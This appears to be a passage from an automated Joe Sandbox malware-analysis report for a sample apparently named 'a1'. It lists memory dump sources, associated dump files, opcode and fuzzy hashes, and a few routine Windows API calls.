                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 1$>
                                                                                                                                                                                                                                                                          • API String ID: 0-383295512
                                                                                                                                                                                                                                                                          • Opcode ID: 8bd7b3b099c470452ecddd3c785e24e58207b09de2d1e97a68d8f8b1baff208e
                                                                                                                                                                                                                                                                          • Instruction ID: b73f09dbbc3f2e2982062a5900431ac4dbb2289fabec7cda9628af27f117bed2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bd7b3b099c470452ecddd3c785e24e58207b09de2d1e97a68d8f8b1baff208e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5D135B0905789EFE706CF64C15878AFFF4BF05308F14829DD4586B282D3BAA658CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: (Z>$DY>
                                                                                                                                                                                                                                                                          • API String ID: 0-551641904
                                                                                                                                                                                                                                                                          • Opcode ID: 377e0be41aa2645a32a37b507230d15c0d3034577477394c7138c666809bc319
                                                                                                                                                                                                                                                                          • Instruction ID: 826eb72a9dedae0b2e5f47f77350e808d3f51f0952313ea7282f103a1e809fae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 377e0be41aa2645a32a37b507230d15c0d3034577477394c7138c666809bc319
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 474104B4901B45EED705CF69C50878AFBF0BB19318F10825ED4589B781C3BAA618CF95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,DF534560,?,?,?,?,00376884,000000FF), ref: 001D1013
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalDeleteSection
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 166494926-0
                                                                                                                                                                                                                                                                          • Opcode ID: 079f0a2c85402cc0ebb57644a131e8e216197a6cc50f62da74023c36a361240c
                                                                                                                                                                                                                                                                          • Instruction ID: 7051e2ec41c46374061f3a8a6c33275db67f1be1887977b3d1de599c8ff582bd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 079f0a2c85402cc0ebb57644a131e8e216197a6cc50f62da74023c36a361240c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4331CEB1A04746FBCB21DF24DD04B8ABBE8BB06310F10426AF824A7792D775E954CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,00000086,?,00000000), ref: 00214625
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                          • Opcode ID: 67efb5c3dd908393868495e171518ec766657799d9c78b8ae1e8eeb17c2c808a
                                                                                                                                                                                                                                                                          • Instruction ID: 7425b3cde6715a874fa60f62ce22aad5609a3b0d5dad3f9ce72c0e99c547e2b3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67efb5c3dd908393868495e171518ec766657799d9c78b8ae1e8eeb17c2c808a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C318D31908255EFDB11CF68DD84B99BBF5FF46320F1042AAE415A72A1CB71AD14CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,0000000C,?,?,?,000000F0,00000000,?,000000F0), ref: 002144B1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1de8b789a925f04bae3ef7cf84cd90e949bf60f7bfb1c38404dd3c0029b0ab42
                                                                                                                                                                                                                                                                          • Instruction ID: d4f2f7da4f1ab590e2abaa32c3ccf1616c24e04cf1e0b568527f920fd844317b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1de8b789a925f04bae3ef7cf84cd90e949bf60f7bfb1c38404dd3c0029b0ab42
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF115E72904219EFDF219F58DD45A9DBBB1FB49321F21032AF425A73E0CB315D119B40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,00000080,?,?,?,000000F0,00000000,?,000000F0), ref: 00214529
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                          • Opcode ID: 641ec01a6c875e3b2c84453e425d68a9f965fa54850ea30174769f22409db236
                                                                                                                                                                                                                                                                          • Instruction ID: 5a8e7681456cc14659864314a8cad1f11a8cc6e8750b5ffc9c42b7174f099c9a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 641ec01a6c875e3b2c84453e425d68a9f965fa54850ea30174769f22409db236
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75113C72908219EFDF219F58DC45A9DBBB2FB49320F20432AF865A73E0CB719D109B40
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,001D47D7,?,?,?,?,?,?,?,?,001D4648,?,?), ref: 001D6150
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                          • Opcode ID: f3709323bc3dc113631c3e44720a80c50cec8d83288fb53c59a3138c257dc8d6
                                                                                                                                                                                                                                                                          • Instruction ID: e960641abf7897e14cc329ef5a596d502ab789d8a109610ae52ed4b8d9417f4d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3709323bc3dc113631c3e44720a80c50cec8d83288fb53c59a3138c257dc8d6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6F0A074008242DEE7108B94CC98B6ABBB6FB85306F5885F7E488C65A3C339DE80DF10
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: b^4
                                                                                                                                                                                                                                                                          • API String ID: 0-2979938867
                                                                                                                                                                                                                                                                          • Opcode ID: bafe06272c26a5ba087a80b61ad9f4d5488654adf2ac592e5498a7fbfec998bd
                                                                                                                                                                                                                                                                          • Instruction ID: 6b2fc6ab249d4dcf098efd1195584a5f8bcd2ff477d2c4abdc8a8bb832edf310
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bafe06272c26a5ba087a80b61ad9f4d5488654adf2ac592e5498a7fbfec998bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 657108B1801B48CFE761CF78C94478ABBF0BB05324F14465DD4A99B3D1D3B9A648CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9b68f086d2e2b517a6f5fc49ceadcad3e166571cb812a20bd3a0d3a833443bcf
                                                                                                                                                                                                                                                                          • Instruction ID: 1f3f247a2e83f89a3b60ceffd58fa5e784585227eacaa3e3ff2d47b697969529
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b68f086d2e2b517a6f5fc49ceadcad3e166571cb812a20bd3a0d3a833443bcf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2141C6B2E002149FCB05CF68C88476EB7E9EB85310F154269E814EB799EF30AD01C7D1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 39a6670d9370074a8953e83625dabedc8c583a3d8a413a0bc62e0b8e2716ec6f
                                                                                                                                                                                                                                                                          • Instruction ID: b9df9f3b1507f3f65a3c5e4e7974c403745ee2ba81b5e5da634b978e9b99d3ce
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39a6670d9370074a8953e83625dabedc8c583a3d8a413a0bc62e0b8e2716ec6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29419AB0604642EFDB11CF68E908B5AFBF8FF05314F004269E4249BB91D776E924CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7f46bee9703b127532f3286a688c2b04e286d8d8aa0f3ff93b1863bea25b9296
                                                                                                                                                                                                                                                                          • Instruction ID: 549c154b024b2f512142ac9d5b01a1ea47f2c2bc84e04f053cff7ee120eada14
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f46bee9703b127532f3286a688c2b04e286d8d8aa0f3ff93b1863bea25b9296
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E318771905606EFCB10DF69CA44B9AFBF5FB05320F204269E424AB6E1C771EE64CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 319b5b76416ff0984048aab3375aebcf32d6348688f5940cdf72b5288e300394
                                                                                                                                                                                                                                                                          • Instruction ID: 8ccaea156793ca5c309dc261930474e7a2dd9d7e7487793738e4037ce08ba6a6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 319b5b76416ff0984048aab3375aebcf32d6348688f5940cdf72b5288e300394
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931D0B1405B84CEE721CF29C658787BFF0BB05718F104A5DD4A64BB91C3BAA648CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c8ad83d9b89f1b4e3554fc084df61d03573c09ce0ea0ef4a386942fbc20f2dba
                                                                                                                                                                                                                                                                          • Instruction ID: c488e5bdcc7af7a242c90c78b6c10bd55a3dd3579e6ad1b7b6799a159f771084
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8ad83d9b89f1b4e3554fc084df61d03573c09ce0ea0ef4a386942fbc20f2dba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D2158B1804748DFD711CF58C90478ABBF4FB0A314F1186AED455AB791E3B9AA04CF95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b8a7b591c9f0647283f63df6958fec760ea835804b5c37460d8ddb798fa6ccbc
                                                                                                                                                                                                                                                                          • Instruction ID: c3049eb841686922b99554a6036f28eb57fb410316e94684b87e1dec9893d688
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8a7b591c9f0647283f63df6958fec760ea835804b5c37460d8ddb798fa6ccbc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E2158B1804788DFD711CF58C90478ABBF4FB09314F1186AED455AB791E3B9AA04CF95
